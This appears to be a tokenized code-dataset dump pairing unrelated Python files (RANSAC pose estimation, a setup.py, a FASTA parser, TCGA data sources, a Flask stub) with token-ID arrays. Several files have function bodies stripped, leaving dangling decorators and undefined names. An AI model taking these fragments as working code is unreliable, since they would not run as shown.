# print("K", K.shape, R.shape, C.shape, x3D.shape)
P = np.dot(np.dot(K, R), np.hstack((np.identity(3), -C)))
X3D = np.vstack((x3D, 1))
# print("P",P.shape, X3D.shape)
u_rprj = (np.dot(P[0, :], X3D)).T / (np.dot(P[2, :], X3D)).T
v_rprj = (np.dot(P[1, :], X3D)).T / (np.dot(P[2, :], X3D)).T
X2D = np.hstack((u_rprj, v_rprj))
return X2D
def PnPRANSAC(X, x, K):
"""Summary
Args:
X (TYPE): Description
x (TYPE): Description
K (TYPE): Description
Returns:
TYPE: Description
"""
cnt = 0
M = x.shape[0]
threshold = 5 #6
x_ = LPnP.convertHomogeneouos(x)
Cnew = np.zeros((3, 1))
Rnew = np.identity(3)
for trails in tqdm(range(500)):
# random.randrange(0, len(corr_list))
random_idx = random.sample(range(M), 6)
C, R = LPnP.LinearPnP(X[random_idx][:], x[random_idx][:], K)
S = []
for j in range(M):
reprojection = proj3Dto2D(x_[j][:], K, C, R)
e = np.sqrt(
np.square((x_[j, 0]) - reprojection[0]) +
np.square((x_[j, 1] - reprojection[1])))
if e < threshold:
S.append(j)
countS = len(S)
if (cnt < countS):
cnt = countS
Rnew = R
Cnew = C
if (countS == M):
break
# print("Inliers = " + str(cnt) + "/" + str(M))
return Cnew, Rnew
| [
37811,
22093,
198,
37811,
198,
11748,
299,
32152,
355,
45941,
198,
11748,
44800,
47,
77,
47,
355,
18470,
77,
47,
198,
11748,
4738,
198,
6738,
256,
80,
36020,
1330,
256,
80,
36020,
628,
198,
4299,
386,
73,
18,
35,
1462,
17,
35,
7,
87,
18,
35,
11,
509,
11,
327,
11,
371,
2599,
198,
220,
220,
220,
37227,
22093,
628,
220,
220,
220,
943,
14542,
25,
198,
220,
220,
220,
220,
220,
220,
220,
2124,
18,
35,
357,
25216,
2599,
12489,
198,
220,
220,
220,
220,
220,
220,
220,
509,
357,
25216,
2599,
12489,
198,
220,
220,
220,
220,
220,
220,
220,
327,
357,
25216,
2599,
12489,
198,
220,
220,
220,
220,
220,
220,
220,
371,
357,
25216,
2599,
12489,
628,
220,
220,
220,
16409,
25,
198,
220,
220,
220,
220,
220,
220,
220,
41876,
25,
12489,
198,
220,
220,
220,
37227,
198,
220,
220,
220,
327,
796,
327,
13,
3447,
1758,
32590,
16,
11,
352,
8,
198,
220,
220,
220,
2124,
18,
35,
796,
2124,
18,
35,
13,
3447,
1758,
32590,
16,
11,
352,
8,
198,
220,
220,
220,
1303,
3601,
7203,
42,
1600,
509,
13,
43358,
11,
371,
13,
43358,
11,
327,
13,
43358,
11,
2124,
18,
35,
13,
43358,
8,
198,
220,
220,
220,
350,
796,
45941,
13,
26518,
7,
37659,
13,
26518,
7,
42,
11,
371,
828,
45941,
13,
71,
25558,
19510,
37659,
13,
738,
414,
7,
18,
828,
532,
34,
22305,
198,
220,
220,
220,
1395,
18,
35,
796,
45941,
13,
85,
25558,
19510,
87,
18,
35,
11,
352,
4008,
628,
220,
220,
220,
1303,
3601,
7203,
47,
1600,
47,
13,
43358,
11,
1395,
18,
35,
13,
43358,
8,
198,
220,
220,
220,
334,
62,
81,
1050,
73,
796,
357,
37659,
13,
26518,
7,
47,
58,
15,
11,
1058,
4357,
1395,
18,
35,
29720,
51,
1220,
357,
37659,
13,
26518,
7,
47,
58,
17,
11,
1058,
4357,
1395,
18,
35,
29720,
51,
198,
220,
220,
220,
410,
62,
81,
1050,
73,
796,
357,
37659,
13,
26518,
7,
47,
58,
16,
11,
1058,
4357,
1395,
18,
35,
29720,
51,
1220,
357,
37659,
13,
26518,
7,
47,
58,
17,
11,
1058,
4357,
1395,
18,
35,
29720,
51,
198,
220,
220,
220,
1395,
17,
35,
796,
45941,
13,
71,
25558,
19510,
84,
62,
81,
1050,
73,
11,
410,
62,
81,
1050,
73,
4008,
198,
220,
220,
220,
1441,
1395,
17,
35,
628,
198,
4299,
350,
77,
4805,
15037,
2246,
7,
55,
11,
2124,
11,
509,
2599,
198,
220,
220,
220,
37227,
22093,
628,
220,
220,
220,
943,
14542,
25,
198,
220,
220,
220,
220,
220,
220,
220,
1395,
357,
25216,
2599,
12489,
198,
220,
220,
220,
220,
220,
220,
220,
2124,
357,
25216,
2599,
12489,
198,
220,
220,
220,
220,
220,
220,
220,
509,
357,
25216,
2599,
12489,
628,
220,
220,
220,
16409,
25,
198,
220,
220,
220,
220,
220,
220,
220,
41876,
25,
12489,
198,
220,
220,
220,
37227,
198,
220,
220,
220,
269,
429,
796,
657,
198,
220,
220,
220,
337,
796,
2124,
13,
43358,
58,
15,
60,
198,
220,
220,
220,
11387,
796,
642,
220,
1303,
21,
198,
220,
220,
220,
2124,
62,
796,
18470,
77,
47,
13,
1102,
1851,
28718,
20878,
280,
418,
7,
87,
8,
628,
220,
220,
220,
327,
3605,
796,
45941,
13,
9107,
418,
19510,
18,
11,
352,
4008,
198,
220,
220,
220,
371,
3605,
796,
45941,
13,
738,
414,
7,
18,
8,
628,
220,
220,
220,
329,
19196,
287,
256,
80,
36020,
7,
9521,
7,
4059,
8,
2599,
198,
220,
220,
220,
220,
220,
220,
220,
1303,
4738,
13,
25192,
9521,
7,
15,
11,
18896,
7,
10215,
81,
62,
4868,
4008,
198,
220,
220,
220,
220,
220,
220,
220,
4738,
62,
312,
87,
796,
4738,
13,
39873,
7,
9521,
7,
44,
828,
718,
8,
198,
220,
220,
220,
220,
220,
220,
220,
327,
11,
371,
796,
18470,
77,
47,
13,
14993,
451,
47,
77,
47,
7,
55,
58,
25120,
62,
312,
87,
7131,
25,
4357,
2124,
58,
25120,
62,
312,
87,
7131,
25,
4357,
509,
8,
198,
220,
220,
220,
220,
220,
220,
220,
311,
796,
17635,
198,
220,
220,
220,
220,
220,
220,
220,
329,
474,
287,
2837,
7,
44,
2599,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
43969,
29192,
796,
386,
73,
18,
35,
1462,
17,
35,
7,
87,
62,
58,
73,
7131,
25,
4357,
509,
11,
327,
11,
371,
8,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
304,
796,
45941,
13,
31166,
17034,
7,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
45941,
13,
23415,
19510,
87,
62,
58,
73,
11,
657,
12962,
532,
43969,
29192,
58,
15,
12962,
1343,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
45941,
13,
23415,
19510,
87,
62,
58,
73,
11,
352,
60,
532,
43969,
29192,
58,
16,
60,
22305,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
611,
304,
1279,
11387,
25,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
311,
13,
33295,
7,
73,
8,
198,
220,
220,
220,
220,
220,
220,
220,
954,
50,
796,
18896,
7,
50,
8,
198,
220,
220,
220,
220,
220,
220,
220,
611,
357,
66,
429,
1279,
954,
50,
2599,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
269,
429,
796,
954,
50,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
371,
3605,
796,
371,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
327,
3605,
796,
327,
628,
220,
220,
220,
220,
220,
220,
220,
611,
357,
9127,
50,
6624,
337,
2599,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
2270,
198,
220,
220,
220,
1303,
3601,
7203,
818,
75,
3183,
796,
366,
1343,
965,
7,
66,
429,
8,
1343,
12813,
1,
1343,
965,
7,
44,
4008,
198,
220,
220,
220,
1441,
327,
3605,
11,
371,
3605,
198
] | 1.814815 | 999 |
#!/usr/bin/env python
from setuptools import setup
from setuptools.command.develop import develop
from setuptools.command.install import install
def friendly(command_subclass):
"""
A decorator for classes subclassing one of the setuptools commands.
It modifies the run() method so that it prints a friendly greeting.
"""
orig_run = command_subclass.run
command_subclass.run = modified_run
return command_subclass
@friendly
setup(name='myPackage',
version='0.1',
description='My first python package',
author='Marcelo Santos',
author_email='[email protected]',
url='https://github.com/mefsantos/branch-testing',
packages=['.', 'modules'],
# Extension('foo', ['src/foo1.c', 'src/foo2.c']),
cmdclass={
'install': CustomInstallCommand,
},
)
| [
2,
48443,
14629,
14,
8800,
14,
24330,
21015,
198,
198,
6738,
900,
37623,
10141,
1330,
9058,
198,
6738,
900,
37623,
10141,
13,
21812,
13,
16244,
1330,
1205,
198,
6738,
900,
37623,
10141,
13,
21812,
13,
17350,
1330,
2721,
628,
198,
4299,
8030,
7,
21812,
62,
7266,
4871,
2599,
198,
197,
37811,
198,
197,
32,
11705,
1352,
329,
6097,
47611,
278,
530,
286,
262,
900,
37623,
10141,
9729,
13,
628,
220,
220,
220,
632,
953,
6945,
262,
1057,
3419,
2446,
523,
326,
340,
20842,
257,
8030,
31933,
13,
198,
197,
37811,
198,
197,
11612,
62,
5143,
796,
3141,
62,
7266,
4871,
13,
5143,
628,
198,
197,
21812,
62,
7266,
4871,
13,
5143,
796,
9518,
62,
5143,
198,
197,
7783,
3141,
62,
7266,
4871,
628,
198,
31,
13120,
628,
198,
40406,
7,
3672,
11639,
1820,
27813,
3256,
198,
220,
220,
220,
220,
220,
2196,
11639,
15,
13,
16,
3256,
198,
220,
220,
220,
220,
220,
6764,
11639,
3666,
717,
21015,
5301,
3256,
198,
220,
220,
220,
220,
220,
1772,
11639,
7676,
5276,
78,
28458,
3256,
198,
220,
220,
220,
220,
220,
1772,
62,
12888,
11639,
12888,
31,
27830,
13,
785,
3256,
198,
220,
220,
220,
220,
220,
19016,
11639,
5450,
1378,
12567,
13,
785,
14,
76,
891,
82,
415,
418,
14,
1671,
3702,
12,
33407,
3256,
198,
220,
220,
220,
220,
220,
10392,
28,
17816,
2637,
11,
705,
18170,
6,
4357,
198,
220,
220,
220,
220,
220,
1303,
27995,
10786,
21943,
3256,
37250,
10677,
14,
21943,
16,
13,
66,
3256,
705,
10677,
14,
21943,
17,
13,
66,
20520,
828,
198,
220,
220,
220,
220,
220,
23991,
4871,
34758,
198,
220,
220,
220,
220,
220,
220,
220,
705,
17350,
10354,
8562,
15798,
21575,
11,
198,
220,
220,
220,
220,
220,
8964,
198,
220,
220,
220,
220,
1267,
628
] | 2.79322 | 295 |
import sys
import os
sys.path.append(os.path.join(os.path.dirname(__file__), os.pardir, 'staticsql')) | [
11748,
25064,
198,
11748,
28686,
198,
198,
17597,
13,
6978,
13,
33295,
7,
418,
13,
6978,
13,
22179,
7,
418,
13,
6978,
13,
15908,
3672,
7,
834,
7753,
834,
828,
28686,
13,
26037,
343,
11,
705,
14269,
873,
13976,
6,
4008
] | 2.487805 | 41 |
if __name__ == '__main__':
import sys
import os.path
if len(sys.argv) != 2:
sys.exit("usage fasta_object fasta_path")
fasta_path = sys.argv[1]
if not os.path.exists(fasta_path):
sys.exit("No such file: {}".format(fasta_path))
fasta_parser = FastaParser(fasta_path)
for sequence in fasta_parser:
print "----------------"
print "{seqid} = {gc:.3%}".format(gc=sequence.gc_percent(),
seqid = sequence.id) | [
198,
198,
361,
11593,
3672,
834,
6624,
705,
834,
12417,
834,
10354,
198,
220,
220,
220,
1330,
25064,
198,
220,
220,
220,
1330,
28686,
13,
6978,
628,
220,
220,
220,
611,
18896,
7,
17597,
13,
853,
85,
8,
14512,
362,
25,
198,
220,
220,
220,
220,
220,
220,
220,
25064,
13,
37023,
7203,
26060,
3049,
64,
62,
15252,
3049,
64,
62,
6978,
4943,
198,
220,
220,
220,
3049,
64,
62,
6978,
796,
25064,
13,
853,
85,
58,
16,
60,
198,
220,
220,
220,
611,
407,
28686,
13,
6978,
13,
1069,
1023,
7,
7217,
64,
62,
6978,
2599,
198,
220,
220,
220,
220,
220,
220,
220,
25064,
13,
37023,
7203,
2949,
884,
2393,
25,
23884,
1911,
18982,
7,
7217,
64,
62,
6978,
4008,
628,
220,
220,
220,
3049,
64,
62,
48610,
796,
12549,
64,
46677,
7,
7217,
64,
62,
6978,
8,
198,
220,
220,
220,
329,
8379,
287,
3049,
64,
62,
48610,
25,
198,
220,
220,
220,
220,
220,
220,
220,
3601,
366,
1783,
1,
198,
220,
220,
220,
220,
220,
220,
220,
3601,
45144,
41068,
312,
92,
796,
1391,
36484,
25,
13,
18,
4,
92,
1911,
18982,
7,
36484,
28,
43167,
13,
36484,
62,
25067,
22784,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
33756,
312,
796,
8379,
13,
312,
8
] | 2.065306 | 245 |
""" Escreva um programa que pergunte o salário de um funcionário e calcule o valor do seu aumento.
Para salários superiores a R$1.250,00, calcule um aumento de 10%. Para os inferiores ou iguais, o aumento é de 15%."""
salario = float(input('Qual valor do seu salario R$ '))
if salario <= 1249.99:
aumento = (salario * 10)/ 100
print('Seu aumento foi de 10% e seu salario atual é de R$ {:.2f}'.format(aumento+salario))
else:
aumento = (salario * 15) /100
print('Seu aumento foi de 15% e seu salario atual é de R$ {:.2f}'.format(aumento+salario))
| [
37811,
16319,
260,
6862,
23781,
1430,
64,
8358,
583,
70,
6311,
267,
3664,
6557,
27250,
390,
23781,
25439,
295,
6557,
27250,
304,
2386,
23172,
267,
1188,
273,
466,
384,
84,
257,
1713,
78,
13,
198,
47,
3301,
3664,
6557,
380,
418,
2208,
72,
2850,
257,
371,
3,
16,
13,
9031,
11,
405,
11,
2386,
23172,
23781,
257,
1713,
78,
390,
838,
7225,
2547,
64,
28686,
13249,
72,
2850,
267,
84,
45329,
6413,
271,
11,
267,
257,
1713,
78,
38251,
390,
1315,
4,
526,
15931,
198,
198,
21680,
4982,
796,
12178,
7,
15414,
10786,
46181,
1188,
273,
466,
384,
84,
3664,
4982,
371,
3,
705,
4008,
198,
361,
3664,
4982,
19841,
1105,
2920,
13,
2079,
25,
198,
220,
220,
220,
257,
1713,
78,
796,
357,
21680,
4982,
1635,
838,
20679,
1802,
198,
220,
220,
220,
3601,
10786,
4653,
84,
257,
1713,
78,
11511,
72,
390,
838,
4,
304,
384,
84,
3664,
4982,
379,
723,
38251,
390,
371,
3,
46110,
13,
17,
69,
92,
4458,
18982,
7,
64,
1713,
78,
10,
21680,
4982,
4008,
198,
17772,
25,
198,
220,
220,
220,
257,
1713,
78,
796,
357,
21680,
4982,
1635,
1315,
8,
1220,
3064,
198,
220,
220,
220,
3601,
10786,
4653,
84,
257,
1713,
78,
11511,
72,
390,
1315,
4,
304,
384,
84,
3664,
4982,
379,
723,
38251,
390,
371,
3,
46110,
13,
17,
69,
92,
4458,
18982,
7,
64,
1713,
78,
10,
21680,
4982,
4008,
628,
628,
628,
198
] | 2.396624 | 237 |
from .base_identity import BaseIdentity
from ...driver.support.driver_support import DriverSupport
class OneDriveVercelIndex(BaseIdentity):
"""OneDriveVercelIndex object to identify said OD"""
@staticmethod
@staticmethod
def _footer(driver) -> bool:
"""Check for the 'powered by onedrive-vercel-index' tagline
:param WebDriver driver: Selenium WebDriver
:return:
"""
return OneDriveVercelIndex._attr_check(driver, "main + div a[href]", "href",
"spencerwooo/onedrive-vercel-index")
@staticmethod
def _meta_tag(driver) -> bool:
"""Search meta tag for id
:param WebDriver driver: Selenium WebDriver
:return:
"""
element = DriverSupport.get_element(driver, 'meta[content="OneDrive Vercel Index"]', "")
return bool(element)
@staticmethod
def _flag_crumb(driver) -> bool:
"""Finds id of the through its iconic flag
:param WebDriver driver: Selenium WebDriver
:return:
"""
element = DriverSupport.get_element(driver, r"div.dark\:text-gray-300 div a", "")
return OneDriveVercelIndex._text_check(element, "🚩 Home")
| [
6738,
764,
8692,
62,
738,
414,
1330,
7308,
7390,
26858,
198,
6738,
2644,
26230,
13,
11284,
13,
26230,
62,
11284,
1330,
12434,
15514,
628,
198,
4871,
1881,
24825,
13414,
5276,
15732,
7,
14881,
7390,
26858,
2599,
198,
220,
220,
220,
37227,
3198,
24825,
13414,
5276,
15732,
2134,
284,
5911,
531,
31245,
37811,
628,
220,
220,
220,
2488,
12708,
24396,
628,
220,
220,
220,
2488,
12708,
24396,
198,
220,
220,
220,
825,
4808,
5898,
263,
7,
26230,
8,
4613,
20512,
25,
198,
220,
220,
220,
220,
220,
220,
220,
37227,
9787,
329,
262,
705,
12293,
416,
319,
276,
11590,
12,
332,
5276,
12,
9630,
6,
7621,
1370,
628,
220,
220,
220,
220,
220,
220,
220,
1058,
17143,
5313,
32103,
4639,
25,
15300,
47477,
5313,
32103,
198,
220,
220,
220,
220,
220,
220,
220,
1058,
7783,
25,
198,
220,
220,
220,
220,
220,
220,
220,
37227,
198,
220,
220,
220,
220,
220,
220,
220,
1441,
1881,
24825,
13414,
5276,
15732,
13557,
35226,
62,
9122,
7,
26230,
11,
366,
12417,
1343,
2659,
257,
58,
33257,
60,
1600,
366,
33257,
1600,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
366,
2777,
12137,
86,
34160,
14,
12004,
11590,
12,
332,
5276,
12,
9630,
4943,
628,
220,
220,
220,
2488,
12708,
24396,
198,
220,
220,
220,
825,
4808,
28961,
62,
12985,
7,
26230,
8,
4613,
20512,
25,
198,
220,
220,
220,
220,
220,
220,
220,
37227,
18243,
13634,
7621,
329,
4686,
628,
220,
220,
220,
220,
220,
220,
220,
1058,
17143,
5313,
32103,
4639,
25,
15300,
47477,
5313,
32103,
198,
220,
220,
220,
220,
220,
220,
220,
1058,
7783,
25,
198,
220,
220,
220,
220,
220,
220,
220,
37227,
198,
220,
220,
220,
220,
220,
220,
220,
5002,
796,
12434,
15514,
13,
1136,
62,
30854,
7,
26230,
11,
705,
28961,
58,
11299,
2625,
3198,
24825,
4643,
5276,
12901,
8973,
3256,
366,
4943,
198,
220,
220,
220,
220,
220,
220,
220,
1441,
20512,
7,
30854,
8,
628,
220,
220,
220,
2488,
12708,
24396,
198,
220,
220,
220,
825,
4808,
32109,
62,
6098,
2178,
7,
26230,
8,
4613,
20512,
25,
198,
220,
220,
220,
220,
220,
220,
220,
37227,
16742,
82,
4686,
286,
262,
832,
663,
14133,
6056,
628,
220,
220,
220,
220,
220,
220,
220,
1058,
17143,
5313,
32103,
4639,
25,
15300,
47477,
5313,
32103,
198,
220,
220,
220,
220,
220,
220,
220,
1058,
7783,
25,
198,
220,
220,
220,
220,
220,
220,
220,
37227,
198,
220,
220,
220,
220,
220,
220,
220,
5002,
796,
12434,
15514,
13,
1136,
62,
30854,
7,
26230,
11,
374,
1,
7146,
13,
21953,
59,
25,
5239,
12,
44605,
12,
6200,
2659,
257,
1600,
366,
4943,
198,
220,
220,
220,
220,
220,
220,
220,
1441,
1881,
24825,
13414,
5276,
15732,
13557,
5239,
62,
9122,
7,
30854,
11,
366,
8582,
248,
102,
5995,
4943,
198
] | 2.45509 | 501 |
import copy
import re
import json
import logging
import requests
import datetime
import shutil
import os
import tarfile
import uuid
import pandas as pd
from django.conf import settings
from api.utilities.basic_utils import get_with_retry, \
make_local_directory
from .gdc import GDCDataSource, GDCRnaSeqDataSourceMixin
logger = logging.getLogger(__name__)
class TCGADataSource(GDCDataSource):
'''
A general class for pulling data from TCGA, exposed via the GDC API
'''
# All the TCGA-based data will be stored in this directory
ROOT_DIR = os.path.join(settings.PUBLIC_DATA_DIR, 'tcga')
def get_additional_metadata(self):
'''
For the TCGA datasets, we would like an additional mapping from the shorthand ID
(e.g. TCGA-LUAD) to the "full" name (e.g. lung adenocarcinoma)
'''
mapping = self.query_for_project_names_within_program('TCGA')
return {'tcga_type_to_name_map': mapping}
class TCGARnaSeqDataSource(TCGADataSource, GDCRnaSeqDataSourceMixin):
'''
A specific implementation of the TCGA data source specific to
RNA-seq.
'''
# A short name (string) which can be used as a "title" for the dataset
PUBLIC_NAME = 'TCGA RNA-Seq'
# A longer, more descriptive text explaining the datasource:
DESCRIPTION = ('TCGA RNA-Seq expression data as processed by the'
' Genomic Data Commons'
' <a href="https://docs.gdc.cancer.gov/Data/Bioinformatics_Pipelines/Expression_mRNA_Pipeline/">'
' mRNA analysis pipeline</a>. Quantifications from this pipeline'
' are produced by HTSeq.'
)
# a string which will make it obvious where the data has come from. For example, we can use
# this tag to name an output file produced by this class (e.g. the count matrix).
# We also use this tag
TAG = 'tcga-rnaseq'
# An example of how one might query this dataset, so we can provide useful
# help for dataset creation errors:
EXAMPLE_PAYLOAD = {
'TCGA-UVM': ["<UUID>","<UUID>"],
'TCGA-MESO': ["<UUID>","<UUID>", "<UUID>"]
}
def prepare(self):
'''
Entry method for downloading and munging the TCGA RNA-seq dataset
to a HDF5 file
'''
self._pull_data('TCGA', self.TAG)
def get_additional_metadata(self):
'''
This just uses the parent method which maps the TCGA IDs to
the name (e.g. TCGA-LUAD --> Lung adenocarcinoma)
'''
# uses the get_additional_metadata method of TCGADataSource
# per python's MRO
return super().get_additional_metadata() | [
11748,
4866,
198,
11748,
302,
198,
11748,
33918,
198,
11748,
18931,
198,
11748,
7007,
198,
11748,
4818,
8079,
198,
11748,
4423,
346,
198,
11748,
28686,
198,
11748,
13422,
7753,
198,
11748,
334,
27112,
198,
220,
198,
11748,
19798,
292,
355,
279,
67,
198,
198,
6738,
42625,
14208,
13,
10414,
1330,
6460,
198,
198,
6738,
40391,
13,
315,
2410,
13,
35487,
62,
26791,
1330,
651,
62,
4480,
62,
1186,
563,
11,
3467,
198,
220,
220,
220,
787,
62,
12001,
62,
34945,
198,
6738,
764,
70,
17896,
1330,
402,
9697,
6601,
7416,
11,
27044,
9419,
2616,
4653,
80,
6601,
7416,
35608,
259,
198,
198,
6404,
1362,
796,
18931,
13,
1136,
11187,
1362,
7,
834,
3672,
834,
8,
198,
198,
4871,
17283,
38,
2885,
1045,
7416,
7,
38,
9697,
6601,
7416,
2599,
198,
220,
220,
220,
705,
7061,
198,
220,
220,
220,
317,
2276,
1398,
329,
10427,
1366,
422,
17283,
9273,
11,
7362,
2884,
262,
402,
9697,
7824,
198,
220,
220,
220,
705,
7061,
628,
220,
220,
220,
1303,
1439,
262,
17283,
9273,
12,
3106,
1366,
481,
307,
8574,
287,
428,
8619,
198,
220,
220,
220,
15107,
2394,
62,
34720,
796,
28686,
13,
6978,
13,
22179,
7,
33692,
13,
5105,
32936,
62,
26947,
62,
34720,
11,
705,
23047,
4908,
11537,
628,
220,
220,
220,
825,
651,
62,
2860,
1859,
62,
38993,
7,
944,
2599,
198,
220,
220,
220,
220,
220,
220,
220,
705,
7061,
198,
220,
220,
220,
220,
220,
220,
220,
1114,
262,
17283,
9273,
40522,
11,
356,
561,
588,
281,
3224,
16855,
422,
262,
45883,
4522,
220,
198,
220,
220,
220,
220,
220,
220,
220,
357,
68,
13,
70,
13,
17283,
9273,
12,
41596,
2885,
8,
284,
262,
366,
12853,
1,
1438,
357,
68,
13,
70,
13,
12317,
512,
268,
420,
5605,
259,
6086,
8,
220,
198,
220,
220,
220,
220,
220,
220,
220,
705,
7061,
198,
220,
220,
220,
220,
220,
220,
220,
16855,
796,
2116,
13,
22766,
62,
1640,
62,
16302,
62,
14933,
62,
33479,
62,
23065,
10786,
4825,
9273,
11537,
198,
220,
220,
220,
220,
220,
220,
220,
1441,
1391,
6,
23047,
4908,
62,
4906,
62,
1462,
62,
3672,
62,
8899,
10354,
16855,
92,
628,
198,
4871,
17283,
38,
1503,
2616,
4653,
80,
6601,
7416,
7,
4825,
38,
2885,
1045,
7416,
11,
27044,
9419,
2616,
4653,
80,
6601,
7416,
35608,
259,
2599,
198,
220,
220,
220,
705,
7061,
198,
220,
220,
220,
317,
2176,
7822,
286,
262,
17283,
9273,
1366,
2723,
2176,
284,
198,
220,
220,
220,
25897,
12,
41068,
13,
198,
220,
220,
220,
705,
7061,
628,
220,
220,
220,
1303,
317,
1790,
1438,
357,
8841,
8,
543,
460,
307,
973,
355,
257,
366,
7839,
1,
329,
262,
27039,
198,
220,
220,
220,
44731,
62,
20608,
796,
705,
4825,
9273,
25897,
12,
4653,
80,
6,
628,
220,
220,
220,
1303,
317,
2392,
11,
517,
35644,
2420,
11170,
262,
19395,
1668,
25,
198,
220,
220,
220,
22196,
40165,
796,
19203,
4825,
9273,
25897,
12,
4653,
80,
5408,
1366,
355,
13686,
416,
262,
6,
198,
220,
220,
220,
220,
220,
220,
220,
705,
5215,
10179,
6060,
13815,
6,
198,
220,
220,
220,
220,
220,
220,
220,
705,
1279,
64,
13291,
2625,
5450,
1378,
31628,
13,
70,
17896,
13,
48870,
13,
9567,
14,
6601,
14,
42787,
259,
18982,
873,
62,
47,
541,
20655,
14,
16870,
2234,
62,
76,
27204,
62,
47,
541,
4470,
14,
5320,
6,
198,
220,
220,
220,
220,
220,
220,
220,
705,
47227,
3781,
11523,
3556,
64,
28401,
16972,
6637,
422,
428,
11523,
6,
198,
220,
220,
220,
220,
220,
220,
220,
705,
389,
4635,
416,
7154,
4653,
80,
2637,
198,
220,
220,
220,
1267,
628,
220,
220,
220,
1303,
257,
4731,
543,
481,
787,
340,
3489,
810,
262,
1366,
468,
1282,
422,
13,
1114,
1672,
11,
356,
460,
779,
198,
220,
220,
220,
1303,
428,
7621,
284,
1438,
281,
5072,
2393,
4635,
416,
428,
1398,
357,
68,
13,
70,
13,
262,
954,
17593,
737,
198,
220,
220,
220,
1303,
775,
635,
779,
428,
7621,
198,
220,
220,
220,
37801,
796,
705,
23047,
4908,
12,
35906,
589,
80,
6,
628,
220,
220,
220,
1303,
1052,
1672,
286,
703,
530,
1244,
12405,
428,
27039,
11,
523,
356,
460,
2148,
4465,
198,
220,
220,
220,
1303,
1037,
329,
27039,
6282,
8563,
25,
198,
220,
220,
220,
7788,
2390,
16437,
62,
4537,
56,
35613,
796,
1391,
198,
220,
220,
220,
220,
220,
220,
220,
705,
4825,
9273,
12,
52,
15996,
10354,
14631,
27,
52,
27586,
29,
2430,
27,
52,
27586,
24618,
4357,
198,
220,
220,
220,
220,
220,
220,
220,
705,
4825,
9273,
12,
44,
1546,
46,
10354,
14631,
27,
52,
27586,
29,
2430,
27,
52,
27586,
29,
1600,
33490,
52,
27586,
29,
8973,
198,
220,
220,
220,
1782,
628,
220,
220,
220,
825,
8335,
7,
944,
2599,
198,
220,
220,
220,
220,
220,
220,
220,
705,
7061,
198,
220,
220,
220,
220,
220,
220,
220,
21617,
2446,
329,
22023,
290,
285,
2150,
278,
262,
17283,
9273,
25897,
12,
41068,
27039,
198,
220,
220,
220,
220,
220,
220,
220,
284,
257,
5572,
37,
20,
2393,
198,
220,
220,
220,
220,
220,
220,
220,
705,
7061,
198,
220,
220,
220,
220,
220,
220,
220,
2116,
13557,
31216,
62,
7890,
10786,
4825,
9273,
3256,
2116,
13,
42197,
8,
628,
220,
220,
220,
825,
651,
62,
2860,
1859,
62,
38993,
7,
944,
2599,
198,
220,
220,
220,
220,
220,
220,
220,
705,
7061,
198,
220,
220,
220,
220,
220,
220,
220,
770,
655,
3544,
262,
2560,
2446,
543,
8739,
262,
17283,
9273,
32373,
284,
198,
220,
220,
220,
220,
220,
220,
220,
262,
1438,
357,
68,
13,
70,
13,
17283,
9273,
12,
41596,
2885,
14610,
39337,
512,
268,
420,
5605,
259,
6086,
8,
198,
220,
220,
220,
220,
220,
220,
220,
705,
7061,
198,
220,
220,
220,
220,
220,
220,
220,
1303,
3544,
262,
651,
62,
2860,
1859,
62,
38993,
2446,
286,
17283,
38,
2885,
1045,
7416,
198,
220,
220,
220,
220,
220,
220,
220,
1303,
583,
21015,
338,
337,
13252,
198,
220,
220,
220,
220,
220,
220,
220,
1441,
2208,
22446,
1136,
62,
2860,
1859,
62,
38993,
3419
] | 2.607356 | 1,006 |
# -*- coding: utf-8 -*-
"""
Test the ssh_auth states
"""
# Import python libs
from __future__ import absolute_import, print_function, unicode_literals
import os
# Import salt libs
import salt.utils.files
# Import Salt Testing libs
from tests.support.case import ModuleCase
from tests.support.helpers import destructiveTest, skip_if_not_root, with_system_user
from tests.support.mixins import SaltReturnAssertsMixin
from tests.support.runtests import RUNTIME_VARS
from tests.support.unit import skipIf
| [
2,
532,
9,
12,
19617,
25,
3384,
69,
12,
23,
532,
9,
12,
198,
37811,
198,
14402,
262,
26678,
62,
18439,
2585,
198,
37811,
198,
198,
2,
17267,
21015,
9195,
82,
198,
6738,
11593,
37443,
834,
1330,
4112,
62,
11748,
11,
3601,
62,
8818,
11,
28000,
1098,
62,
17201,
874,
198,
198,
11748,
28686,
198,
198,
2,
17267,
8268,
9195,
82,
198,
11748,
8268,
13,
26791,
13,
16624,
198,
198,
2,
17267,
13754,
23983,
9195,
82,
198,
6738,
5254,
13,
11284,
13,
7442,
1330,
19937,
20448,
198,
6738,
5254,
13,
11284,
13,
16794,
364,
1330,
17656,
14402,
11,
14267,
62,
361,
62,
1662,
62,
15763,
11,
351,
62,
10057,
62,
7220,
198,
6738,
5254,
13,
11284,
13,
19816,
1040,
1330,
13754,
13615,
8021,
861,
82,
35608,
259,
198,
6738,
5254,
13,
11284,
13,
81,
2797,
3558,
1330,
32494,
34694,
62,
53,
27415,
198,
6738,
5254,
13,
11284,
13,
20850,
1330,
14267,
1532,
628
] | 3.30719 | 153 |
""" service_user.py """
from flask import Flask, jsonify
app = Flask(__name__)
@app.route("/user", methods=['GET'])
if __name__ == "__main__":
app.run(port=3002, debug=True)
| [
37811,
2139,
62,
7220,
13,
9078,
37227,
198,
198,
6738,
42903,
1330,
46947,
11,
33918,
1958,
628,
198,
1324,
